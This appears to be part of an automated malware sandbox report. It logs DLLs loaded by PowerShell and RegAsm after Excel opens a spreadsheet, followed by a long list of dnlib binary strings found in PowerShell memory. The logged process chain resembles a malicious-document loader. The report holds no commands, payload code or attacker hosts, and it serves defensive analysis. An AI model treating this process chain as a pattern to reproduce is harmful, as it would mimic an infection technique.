            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: shcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: nlaapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
            Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
            Source: AWD 490104998518.xls Static file information: File size 1302528 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000A.00000002.437191072.0000000003409000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.440136347.0000000006230000.00000004.08000000.00040000.00000000.sdmp
